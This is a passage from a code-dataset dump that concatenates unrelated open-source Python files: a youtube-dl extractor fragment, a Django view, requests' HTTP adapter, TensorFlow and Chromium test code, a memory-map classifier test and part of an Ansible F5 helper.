sc_url = self._SOUNDCLOUD_SONG_URL.format(song['filename'])
entry.update(self.url_result(sc_url, 'Soundcloud'))
entries.append(entry)
else:
self.report_warning('Unknown song source: %s' % song['source'])
if mobj.group('songnr'):
songnr = int(mobj.group('songnr')) - 1
try:
return entries[songnr]
except IndexError:
raise ExtractorError(
'No song with index: %s' % mobj.group('songnr'),
expected=True)
return {
'_type': 'playlist',
'id': tape['id'],
'display_id': display_id,
'title': tape['name'],
'entries': entries,
'thumbnail': tape.get('image_url'),
'description': clean_html(tape.get('subtext')),
'like_count': tape.get('likescount'),
'uploader_id': tape.get('user_id'),
'timestamp': parse_iso8601(tape.get('published_at')),
}
| unlicense |
wavelets/alpha | pau/views/base.py | 3 | 2277 | import logging
from django.conf import settings
from django.contrib.auth import logout as auth_logout
from django.http import HttpResponseRedirect
from paucore.utils.web import smart_reverse
from paucore.web.template import render_template_response
from paucore.web.views import MMLActionView
from pau import bridge
from pau.forms import ReportPostForm
from pau.views.mixins import OAuthLoginRequiredViewMixin
logger = logging.getLogger(__name__)
def rate_limit_handler(request, *args, **kwargs):
response = render_template_response(request, {}, '429.html')
response.status_code = 429
return response
class PauMMLActionView(OAuthLoginRequiredViewMixin, MMLActionView):
selected_nav_page = None
minify_html = False
def populate_context(self, request, *args, **kwargs):
super(PauMMLActionView, self).populate_context(request, *args, **kwargs)
self.view_ctx.update_ctx({
'__js_page_load_hooks': ['utils.handle_resize', 'init_pau', 'init_post_delete', 'init_mute_user', 'init_post_report',
'init_star_post', 'init_repost', 'pau.init_fixed_nav'],
'__js_api_options': {
'api_base_url': smart_reverse(request, 'omo_api_proxy'),
},
'__js_canvas_mode': 'pau',
'__js_subscribe_url': 'https://account.app.net/upgrade/',
'__js_upgrade_storage_url': 'https://account.app.net/settings/upgrade/storage/',
'selected_nav_page': self.selected_nav_page,
'explore_streams': bridge.list_explore_streams(request),
'report_post_form': ReportPostForm(),
})
self.view_ctx.forms = []
def dispatch(self, request, *args, **kwargs):
try:
response = super(PauMMLActionView, self).dispatch(request, *args, **kwargs)
except bridge.AlphaRateLimitAPIException, e:
logger.warn('Hit an api rate limit: %s', e)
return rate_limit_handler(request, *args, **kwargs)
except bridge.AlphaAuthAPIException, e:
logger.info('Alpha auth API execption: %s', e)
auth_logout(request)
return HttpResponseRedirect('/')
response['X-Build-Info'] = settings.BUILD_INFO
return response
| mit |
vipulkanade/EventbriteDjango | lib/python2.7/site-packages/pip/_vendor/requests/adapters.py | 175 | 17495 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import os.path
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .packages.urllib3.util.retry import Retry
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url, urldefragauth,
select_proxy)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import ClosedPoolError
from .packages.urllib3.exceptions import ConnectTimeoutError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import NewConnectionError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .packages.urllib3.exceptions import ProtocolError
from .packages.urllib3.exceptions import ReadTimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import ResponseError
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError)
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
DEFAULT_POOL_TIMEOUT = None
class BaseAdapter(object):
"""The Base Transport Adapter"""
def __init__(self):
super(BaseAdapter, self).__init__()
def send(self):
raise NotImplementedError
def close(self):
raise NotImplementedError
class HTTPAdapter(BaseAdapter):
"""The built-in HTTP Adapter for urllib3.
Provides a general-case interface for Requests sessions to contact HTTP and
HTTPS urls by implementing the Transport Adapter interface. This class will
usually be created by the :class:`Session <Session>` class under the
covers.
:param pool_connections: The number of urllib3 connection pools to cache.
:param pool_maxsize: The maximum number of connections to save in the pool.
:param int max_retries: The maximum number of retries each connection
should attempt. Note, this applies only to failed DNS lookups, socket
connections and connection timeouts, never to requests where data has
made it to the server. By default, Requests does not retry failed
connections. If you need granular control over the conditions under
which we retry a request, import urllib3's ``Retry`` class and pass
that instead.
:param pool_block: Whether the connection pool should block for connections.
Usage::
>>> import requests
>>> s = requests.Session()
>>> a = requests.adapters.HTTPAdapter(max_retries=3)
>>> s.mount('http://', a)
"""
__attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
'_pool_block']
def __init__(self, pool_connections=DEFAULT_POOLSIZE,
pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
pool_block=DEFAULT_POOLBLOCK):
if max_retries == DEFAULT_RETRIES:
self.max_retries = Retry(0, read=False)
else:
self.max_retries = Retry.from_int(max_retries)
self.config = {}
self.proxy_manager = {}
super(HTTPAdapter, self).__init__()
self._pool_connections = pool_connections
self._pool_maxsize = pool_maxsize
self._pool_block = pool_block
self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
def __getstate__(self):
return dict((attr, getattr(self, attr, None)) for attr in
self.__attrs__)
def __setstate__(self, state):
# Can't handle by adding 'proxy_manager' to self.__attrs__ because
# self.poolmanager uses a lambda function, which isn't pickleable.
self.proxy_manager = {}
self.config = {}
for attr, value in state.items():
setattr(self, attr, value)
self.init_poolmanager(self._pool_connections, self._pool_maxsize,
block=self._pool_block)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
"""Initializes a urllib3 PoolManager.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param connections: The number of urllib3 connection pools to cache.
:param maxsize: The maximum number of connections to save in the pool.
:param block: Block when no free connections are available.
:param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
"""
# save these values for pickling
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
block=block, strict=True, **pool_kwargs)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
if not proxy in self.proxy_manager:
proxy_headers = self.proxy_headers(proxy)
self.proxy_manager[proxy] = proxy_from_url(
proxy,
proxy_headers=proxy_headers,
num_pools=self._pool_connections,
maxsize=self._pool_maxsize,
block=self._pool_block,
**proxy_kwargs)
return self.proxy_manager[proxy]
def cert_verify(self, conn, url, verify, cert):
"""Verify a SSL certificate. This method should not be called from user
code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param conn: The urllib3 connection object associated with the cert.
:param url: The requested URL.
:param verify: Whether we should actually verify the certificate.
:param cert: The SSL certificate to verify.
"""
if url.lower().startswith('https') and verify:
cert_loc = None
# Allow self-specified cert location.
if verify is not True:
cert_loc = verify
if not cert_loc:
cert_loc = DEFAULT_CA_BUNDLE_PATH
if not cert_loc:
raise Exception("Could not find a suitable SSL CA certificate bundle.")
conn.cert_reqs = 'CERT_REQUIRED'
if not os.path.isdir(cert_loc):
conn.ca_certs = cert_loc
else:
conn.ca_cert_dir = cert_loc
else:
conn.cert_reqs = 'CERT_NONE'
conn.ca_certs = None
conn.ca_cert_dir = None
if cert:
if not isinstance(cert, basestring):
conn.cert_file = cert[0]
conn.key_file = cert[1]
else:
conn.cert_file = cert
def build_response(self, req, resp):
"""Builds a :class:`Response <requests.Response>` object from a urllib3
response. This should not be called from user code, and is only exposed
for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
:param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
:param resp: The urllib3 response object.
"""
response = Response()
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
response.raw = resp
response.reason = response.raw.reason
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
# Add new cookies from the server.
extract_cookies_to_jar(response.cookies, req, resp)
# Give the Response some context.
response.request = req
response.connection = self
return response
def get_connection(self, url, proxies=None):
"""Returns a urllib3 connection for the given URL. This should not be
called from user code, and is only exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param url: The URL to connect to.
:param proxies: (optional) A Requests-style dictionary of proxies used on this request.
"""
proxy = select_proxy(url, proxies)
if proxy:
proxy = prepend_scheme_if_needed(proxy, 'http')
proxy_manager = self.proxy_manager_for(proxy)
conn = proxy_manager.connection_from_url(url)
else:
# Only scheme should be lower case
parsed = urlparse(url)
url = parsed.geturl()
conn = self.poolmanager.connection_from_url(url)
return conn
def close(self):
"""Disposes of any internal state.
Currently, this just closes the PoolManager, which closes pooled
connections.
"""
self.poolmanager.clear()
def request_url(self, request, proxies):
"""Obtain the url to use when making the final request.
If the message is being sent through a HTTP proxy, the full URL has to
be used. Otherwise, we should only use the path portion of the URL.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
"""
proxy = select_proxy(request.url, proxies)
scheme = urlparse(request.url).scheme
if proxy and scheme != 'https':
url = urldefragauth(request.url)
else:
url = request.path_url
return url
def add_headers(self, request, **kwargs):
"""Add any headers needed by the connection. As of v2.0 this does
nothing by default, but is left for overriding by users that subclass
the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
:param kwargs: The keyword arguments from the call to send().
"""
pass
def proxy_headers(self, proxy):
"""Returns a dictionary of the headers to add to any request sent
through a proxy. This works with urllib3 magic to ensure that they are
correctly sent to the proxy, rather than in a tunnelled request if
CONNECT is being used.
This should not be called from user code, and is only exposed for use
when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxies: The url of the proxy being used for this request.
"""
headers = {}
username, password = get_auth_from_url(proxy)
if username and password:
headers['Proxy-Authorization'] = _basic_auth_str(username,
password)
return headers
def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
"""Sends PreparedRequest object. Returns Response object.
:param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
:param stream: (optional) Whether to stream the request content.
:param timeout: (optional) How long to wait for the server to send
data before giving up, as a float, or a :ref:`(connect timeout,
read timeout) <timeouts>` tuple.
:type timeout: float or tuple
:param verify: (optional) Whether to verify SSL certificates.
:param cert: (optional) Any user-provided SSL certificate to be trusted.
:param proxies: (optional) The proxies dictionary to apply to the request.
"""
conn = self.get_connection(request.url, proxies)
self.cert_verify(conn, request.url, verify, cert)
url = self.request_url(request, proxies)
self.add_headers(request)
chunked = not (request.body is None or 'Content-Length' in request.headers)
if isinstance(timeout, tuple):
try:
connect, read = timeout
timeout = TimeoutSauce(connect=connect, read=read)
except ValueError as e:
# this may raise a string formatting error.
err = ("Invalid timeout {0}. Pass a (connect, read) "
"timeout tuple, or a single float to set "
"both timeouts to the same value".format(timeout))
raise ValueError(err)
else:
timeout = TimeoutSauce(connect=timeout, read=timeout)
try:
if not chunked:
resp = conn.urlopen(
method=request.method,
url=url,
body=request.body,
headers=request.headers,
redirect=False,
assert_same_host=False,
preload_content=False,
decode_content=False,
retries=self.max_retries,
timeout=timeout
)
# Send the request.
else:
if hasattr(conn, 'proxy_pool'):
conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
low_conn.send(b'0\r\n\r\n')
# Receive the response from the server
try:
# For Python 2.7+ versions, use buffering of HTTP
# responses
r = low_conn.getresponse(buffering=True)
except TypeError:
# For compatibility with Python 2.6 versions and back
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
except (ProtocolError, socket.error) as err:
raise ConnectionError(err, request=request)
except MaxRetryError as e:
if isinstance(e.reason, ConnectTimeoutError):
# TODO: Remove this in 3.0.0: see #2811
if not isinstance(e.reason, NewConnectionError):
raise ConnectTimeout(e, request=request)
if isinstance(e.reason, ResponseError):
raise RetryError(e, request=request)
raise ConnectionError(e, request=request)
except ClosedPoolError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, ReadTimeoutError):
raise ReadTimeout(e, request=request)
else:
raise
return self.build_response(request, resp)
| mit |
theflofly/tensorflow | tensorflow/contrib/data/python/kernel_tests/assert_element_shape_test.py | 8 | 9250 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.data.python.ops import batching
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.platform import test
@test_util.run_v1_only("deprecated API, no eager or V2 test coverage")
class AssertElementShapeTest(test_base.DatasetTestBase):
def test_assert_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(5).map(create_dataset)
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(3).map(create_dataset)
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 10)))
with self.assertRaises(ValueError):
dataset.apply(batching.assert_element_shape(wrong_shapes))
def test_assert_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(5).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(3).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 10)))
iterator = dataset_ops.make_initializable_iterator(
dataset.apply(batching.assert_element_shape(wrong_shapes)))
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
def test_assert_partial_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(5).map(create_dataset)
partial_expected_shape = (
tensor_shape.TensorShape(None), # Unknown shape
tensor_shape.TensorShape((None, 4))) # Partial shape
result = dataset.apply(
batching.assert_element_shape(partial_expected_shape))
# Partial shapes are merged with actual shapes:
actual_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((3, 4)))
self.assertEqual(actual_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_partial_element_shape(self):
def create_dataset(_):
return (array_ops.ones(2, dtype=dtypes.float32),
array_ops.zeros((3, 4), dtype=dtypes.int32))
dataset = dataset_ops.Dataset.range(3).map(create_dataset)
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 10)))
with self.assertRaises(ValueError):
dataset.apply(batching.assert_element_shape(wrong_shapes))
def test_assert_partial_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(5).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
expected_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 4)))
result = dataset.apply(batching.assert_element_shape(expected_shapes))
self.assertEqual(expected_shapes,
dataset_ops.get_legacy_output_shapes(result))
iterator = dataset_ops.make_initializable_iterator(result)
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
for _ in range(5):
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def test_assert_wrong_partial_element_shape_on_unknown_shape_dataset(self):
def create_unknown_shape_dataset(x):
return script_ops.py_func(
lambda _: ( # pylint: disable=g-long-lambda
np.ones(2, dtype=np.float32),
np.zeros((3, 4), dtype=np.int32)),
[x],
[dtypes.float32, dtypes.int32])
dataset = dataset_ops.Dataset.range(3).map(create_unknown_shape_dataset)
unknown_shapes = (tensor_shape.TensorShape(None),
tensor_shape.TensorShape(None))
self.assertEqual(unknown_shapes,
dataset_ops.get_legacy_output_shapes(dataset))
wrong_shapes = (tensor_shape.TensorShape(2),
tensor_shape.TensorShape((None, 10)))
iterator = dataset_ops.make_initializable_iterator(
dataset.apply(batching.assert_element_shape(wrong_shapes)))
init_op = iterator.initializer
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
if __name__ == "__main__":
test.main()
| apache-2.0 |
hgl888/chromium-crosswalk | testing/chromoting/multi_machine_example/example_test_controller.py | 31 | 5717 | #!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The test controller for the chromoting localhost browser_tests.
This test uses the legion framework to setup this controller which will run
the chromoting_integration_tests on a task machine. This is intended to be an
example Legion-based test for the chromoting team.
The controller will start a task machine to run browser_tests_launcher on. The
output of these tests are streamed back to the test controller to be output
on the controller's stdout and stderr channels. The final test output is then
read and becomes the final output of the controller, mirroring the test's
pass/fail result.
"""
import argparse
import logging
import os
import sys
import time
# Map the legion directory so we can import the host controller.
SRC_DIR = os.path.join('..', '..', '..')
sys.path.append(os.path.join(SRC_DIR, 'testing'))
from legion import test_controller
class ExampleController(test_controller.TestController):
"""The test controller for the Chromoting browser_tests."""
def __init__(self):
super(ExampleController, self).__init__()
self.task = None
self.args = None
def RunTest(self):
"""Main method to run the test code."""
self.ParseArgs()
self.CreateTask()
self.TestIntegrationTests()
def CreateBrowserTestsLauncherCommand(self):
return [
'python',
self.TaskAbsPath('../browser_tests_launcher.py'),
'--commands_file', self.TaskAbsPath(self.args.commands_file),
'--prod_dir', self.TaskAbsPath(self.args.prod_dir),
'--cfg_file', self.TaskAbsPath(self.args.cfg_file),
'--me2me_manifest_file', self.TaskAbsPath(
self.args.me2me_manifest_file),
'--it2me_manifest_file', self.TaskAbsPath(
self.args.it2me_manifest_file),
'--user_profile_dir', self.args.user_profile_dir,
]
def TaskAbsPath(self, path):
"""Returns the absolute path to the resource on the task machine.
Args:
path: The relative path to the resource.
Since the test controller and the task machines run in different tmp dirs
on different machines the absolute path cannot be calculated correctly on
this machine. This function maps the relative path (from this directory)
to an absolute path on the task machine.
"""
return self.task.rpc.AbsPath(path)
def CreateTask(self):
"""Creates a task object and sets the proper values."""
self.task = self.CreateNewTask(
isolated_hash=self.args.task_machine,
dimensions={'os': 'Ubuntu-14.04', 'pool': 'Chromoting'})
self.task.Create()
self.task.WaitForConnection()
def ParseArgs(self):
"""Gets the command line args."""
parser = argparse.ArgumentParser()
parser.add_argument('--task_machine',
help='isolated hash of the task machine.')
# The rest of the args are taken from
# testing/chromoting/browser_tests_launcher.py.
parser.add_argument('-f', '--commands_file',
help='path to file listing commands to be launched.')
parser.add_argument('-p', '--prod_dir',
help='path to folder having product and test binaries.')
parser.add_argument('-c', '--cfg_file',
help='path to test host config file.')
parser.add_argument('--me2me_manifest_file',
help='path to me2me host manifest file.')
parser.add_argument('--it2me_manifest_file',
help='path to it2me host manifest file.')
parser.add_argument(
'-u', '--user_profile_dir',
help='path to user-profile-dir, used by connect-to-host tests.')
self.args, _ = parser.parse_known_args()
def TestIntegrationTests(self):
"""Runs the integration tests via browser_tests_launcher.py."""
# Create a process object, configure it, and start it.
# All interactions with the process are based on this "proc" key.
proc = self.task.rpc.subprocess.Process(
self.CreateBrowserTestsLauncherCommand())
# Set the cwd to browser_tests_launcher relative to this directory.
# This allows browser_test_launcher to use relative paths.
self.task.rpc.subprocess.SetCwd(proc, '../')
# Set the task verbosity to true to allow stdout/stderr to be echo'ed to
# run_task's stdout/stderr on the task machine. This can assist in
# debugging.
self.task.rpc.subprocess.SetVerbose(proc)
# Set the process as detached to create it in a new process group.
self.task.rpc.subprocess.SetDetached(proc)
# Start the actual process on the task machine.
self.task.rpc.subprocess.Start(proc)
# Collect the stdout/stderr and emit it from this controller while the
# process is running.
while self.task.rpc.subprocess.Poll(proc) is None:
# Output the test's stdout and stderr in semi-realtime.
# This is not true realtime due to the RPC calls and the 1s sleep.
stdout, stderr = self.task.rpc.subprocess.ReadOutput(proc)
if stdout:
sys.stdout.write(stdout)
if stderr:
sys.stderr.write(stderr)
time.sleep(1)
# Get the return code, clean up the process object.
returncode = self.task.rpc.subprocess.GetReturncode(proc)
self.task.rpc.subprocess.Delete(proc)
# Pass or fail depending on the return code from the browser_tests_launcher.
if returncode != 0:
raise AssertionError('browser_tests_launcher failed with return code '
'%i' % returncode)
if __name__ == '__main__':
ExampleController().RunController()
| bsd-3-clause |
Workday/OpenFrame | tools/memory_inspector/memory_inspector/classification/mmap_classifier_unittest.py | 109 | 3441 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from memory_inspector.classification import mmap_classifier
from memory_inspector.core import memory_map
_TEST_RULES = """
[
{
'name': 'anon',
'mmap_file': r'^\[anon',
'children': [
{
'name': 'jit',
'mmap_prot': 'r-x',
},
],
},
{
'name': 'dev',
'mmap_file': r'^/dev',
'children': [
{
'name': 'gpu',
'mmap_file': r'/gpu',
},
],
},
{
'name': 'lib',
'mmap_file': r'.so$',
'children': [
{
'name': 'data',
'mmap_prot': 'rw',
},
{
'name': 'text',
'mmap_prot': 'r-x',
},
],
},
]
"""
_TEST_MMAPS = [
# START END PROT FILE P.Dirt P.Clean S.Dirt S.Clean
(0x00000, 0x03fff, 'rw--', '[anon]', 4096, 0, 4096, 0),
(0x04000, 0x07fff, 'rw--', '/lib/1.so', 8192, 0, 0, 0),
(0x08000, 0x0bfff, 'r-x-', '/lib/1.so', 4096, 8192, 0, 0),
(0x0c000, 0x0ffff, 'rw--', '/lib/2.so', 0, 0, 4096, 8192),
(0x10000, 0x13fff, 'r-x-', '/lib/2.so', 0, 12288, 0, 4096),
(0x14000, 0x17fff, 'rw--', '/dev/gpu/1', 4096, 0, 0, 0),
(0x18000, 0x1bfff, 'rw--', '/dev/gpu/2', 8192, 0, 4096, 0),
(0x1c000, 0x1ffff, 'rw--', '/dev/foo', 0, 4096, 0, 8192),
(0x20000, 0x23fff, 'r-x-', '[anon:jit]', 8192, 0, 4096, 0),
(0x24000, 0x27fff, 'r---', 'OTHER', 0, 0, 8192, 0),
]
_EXPECTED_RESULTS = {
'Total': [36864, 24576, 24576, 20480],
'Total::anon': [12288, 0, 8192, 0],
'Total::anon::jit': [8192, 0, 4096, 0],
'Total::anon::anon-other': [4096, 0, 4096, 0],
'Total::dev': [12288, 4096, 4096, 8192],
'Total::dev::gpu': [12288, 0, 4096, 0],
'Total::dev::dev-other': [0, 4096, 0, 8192],
'Total::lib': [12288, 20480, 4096, 12288],
'Total::lib::data': [8192, 0, 4096, 8192],
'Total::lib::text': [4096, 20480, 0, 4096],
'Total::lib::lib-other': [0, 0, 0, 0],
'Total::Total-other': [0, 0, 8192, 0],
}
class MmapClassifierTest(unittest.TestCase):
def runTest(self):
rule_tree = mmap_classifier.LoadRules(_TEST_RULES)
mmap = memory_map.Map()
for m in _TEST_MMAPS:
mmap.Add(memory_map.MapEntry(
m[0], m[1], m[2], m[3], 0, m[4], m[5], m[6], m[7]))
res = mmap_classifier.Classify(mmap, rule_tree)
def CheckResult(node, prefix):
node_name = prefix + node.name
self.assertIn(node_name, _EXPECTED_RESULTS)
subtotal = node.values[0]
values = node.values[1:]
# First check that the subtotal matches clean + dirty + shared + priv.
self.assertEqual(subtotal, values[0] + values[1] + values[2] + values[3])
# Then check that the single values match the expectations.
self.assertEqual(values, _EXPECTED_RESULTS[node_name])
for child in node.children:
CheckResult(child, node_name + '::')
CheckResult(res.total, '') | bsd-3-clause |
vmindru/ansible | lib/ansible/module_utils/network/f5/urls.py | 60 | 4623 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
try:
from library.module_utils.network.f5.common import F5ModuleError
except ImportError:
from ansible.module_utils.network.f5.common import F5ModuleError
_CLEAN_HEADER_REGEX_BYTE = re.compile(b'^\\S[^\\r\\n]*$|^$')
_CLEAN_HEADER_REGEX_STR = re.compile(r'^\S[^\r\n]*$|^$')
def check_header_validity(header):
"""Verifies that header value is a string which doesn't contain
leading whitespace or return characters.
NOTE: This is a slightly modified version of the original function
taken from the requests library:
http://docs.python-requests.org/en/master/_modules/requests/utils/
:param header: string containing ':'.
"""
try:
name, value = header.split(':')
except ValueError:
raise F5ModuleError('Invalid header format: {0}'.format(header))
if name == '':
raise F5ModuleError('Invalid header format: {0}'.format(header))
if isinstance(value, bytes):
pat = _CLEAN_HEADER_REGEX_BYTE
else:
pat = _CLEAN_HEADER_REGEX_STR
try:
if not pat.match(value):
raise F5ModuleError("Invalid return character or leading space in header: %s" % name)
except TypeError:
raise F5ModuleError("Value for header {%s: %s} must be of type str or "
"bytes, not %s" % (name, value, type(value)))
def build_service_uri(base_uri, partition, name):
"""Build the proper uri for a service resource.
This follows the scheme:
